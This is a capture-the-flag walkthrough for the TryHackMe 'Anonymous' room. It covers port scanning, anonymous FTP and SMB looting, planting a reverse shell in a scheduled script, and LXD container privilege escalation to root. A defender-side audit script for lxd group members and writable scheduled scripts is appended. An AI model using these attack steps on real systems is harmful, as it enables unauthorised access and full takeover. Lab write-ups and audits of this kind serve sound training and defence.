Anonymous

Room Link: https://tryhackme.com/room/anonymous

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/445 - SMB

Kali

smbclient -L //$VICTIM/

There were just two dog pics, probably not interesting.

Kali

mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *

TCP/21 - FTP

Log in as anonymous with no password.

Kali

ftp $VICTIM 21
binary
passive
cd scripts
mget *

Initial Shell

There were these 3 files

I modified clean.sh to have a reverse shell back to my Kali.

Kali #1

nc -lvnp 1337

Kali #2

ftp $VICTIM 21
binary
passive
cd scripts
put clean.sh

After a few minutes the script was run and I had a shell.

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Followed this link on lxd privilege escalation

Link: https://www.hackingarticles.in/lxd-privilege-escalation/

Victim

id

Kali

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81

Note: The lxd init command was there to resolve a storage pool area issue; it may not always be needed.

Victim

cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
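
Added example, not part of the original write-up: a defender-side audit for the two weaknesses this walkthrough relies on, a scheduled script that accounts other than its owner can overwrite, and membership of the lxd group, which lets an account start a privileged container with the host filesystem mounted. The sample group and passwd entries, the account names and the helper names (group_members, loose_paths, demo) are constructed for illustration.

```shell
#!/usr/bin/env bash
# Defender-side audit (added example, not from the write-up).

# Print every account in GROUP: supplementary members (field 4 of the group
# file) plus accounts whose primary GID in the passwd file is that group.
group_members() {   # usage: group_members GROUP GROUP_FILE PASSWD_FILE
    local gid
    gid=$(awk -F: -v g="$1" '$1 == g { print $3; exit }' "$2")
    [ -n "$gid" ] || return 0          # group not defined: nothing to report
    {
        awk -F: -v g="$1" '$1 == g { n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }' "$2"
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$3"
    } | sort -u
}

# Print files and directories under DIR that are group- or world-writable.
loose_paths() {     # usage: loose_paths DIR
    find "$1" \( -type f -o -type d \) \( -perm -0020 -o -perm -0002 \) -print | sort
}

# Constructed sample data so the script runs offline; on a real host pass
# /etc/group, /etc/passwd and the directory a scheduled job runs scripts from.
demo() {
    local tmp
    tmp=$(mktemp -d)
    printf '%s\n' 'root:x:0:' 'lxd:x:108:alice,bob' 'ftp:x:115:' > "$tmp/group"
    printf '%s\n' 'alice:x:1000:1000::/home/alice:/bin/bash' \
                  'carol:x:1002:108::/home/carol:/bin/bash' > "$tmp/passwd"
    mkdir "$tmp/scripts"
    touch "$tmp/scripts/clean.sh" "$tmp/scripts/backup.sh"
    chmod 755 "$tmp/scripts" "$tmp/scripts/backup.sh"
    chmod 757 "$tmp/scripts/clean.sh"  # constructed: world-writable script
    echo "Accounts that can drive LXD:"
    group_members lxd "$tmp/group" "$tmp/passwd"
    echo "Writable by non-owners:"
    loose_paths "$tmp/scripts"
    rm -rf "$tmp"
}
demo
```

Any account the first check prints should be treated as root-equivalent, and any path the second check prints under a directory exposed over FTP or SMB should be owned by root and not writable by anyone else.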
